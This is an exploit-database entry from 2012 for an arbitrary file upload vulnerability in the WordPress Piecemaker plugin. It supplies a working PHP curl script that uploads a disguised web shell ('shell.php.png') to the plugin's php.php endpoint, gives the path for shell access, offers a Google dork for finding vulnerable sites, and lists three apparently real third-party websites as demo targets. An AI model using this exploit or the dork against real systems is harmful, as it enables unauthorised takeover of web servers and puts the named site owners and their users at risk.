Wordpress Plugins - Piecemaker Arbitrary File Upload Vulnerability

2012-06-30T00:00:00
ID 1337DAY-ID-18877
Type zdt
Reporter Ramzi Null
Modified 2012-06-30T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ##########################################################################################
# Description : Wordpress Plugins - Piecemaker Arbitrary File Upload Vulnerability
# Version : 1.1
# Link : http://wordpress.org/extend/plugins/the-piecemaker/
# Plugins : http://downloads.wordpress.org/plugin/the-piecemaker.1.1.zip
# Date : 30-06-2012
# Google Dork : inurl:wp-content/plugins/piecemaker/
# Site : 1337day.com Inj3ct0r Exploit Database
# Tested on: win 7
# Demo site: http://www.eyespeek.com/photoandfilm/wp-content/plugins/piecemaker/php.php
#            http://dogschool.gr/wp-content/plugins/piecemaker/php.php
#            http://timesharelegal.net/wp-content/plugins/piecemaker/php.php
# Author : Ramzi Null
###########################################################################################

Exploit :

<?php
$uploadfile="shell.php.png";
$ch = curl_init("http://www.exemple.com/wordpress/wp-content/plugins/piecemaker/php.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
       array("theme[change_bouton_recherche]"=>"@$uploadfile",
              'submit'=>'submit'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://www.exemple.com/wordpress/wp-content/plugins/piecemaker/uploads/shell.php.png

*******************
Greet To : Ned Null
*******************



#  0day.today [2018-04-10]  #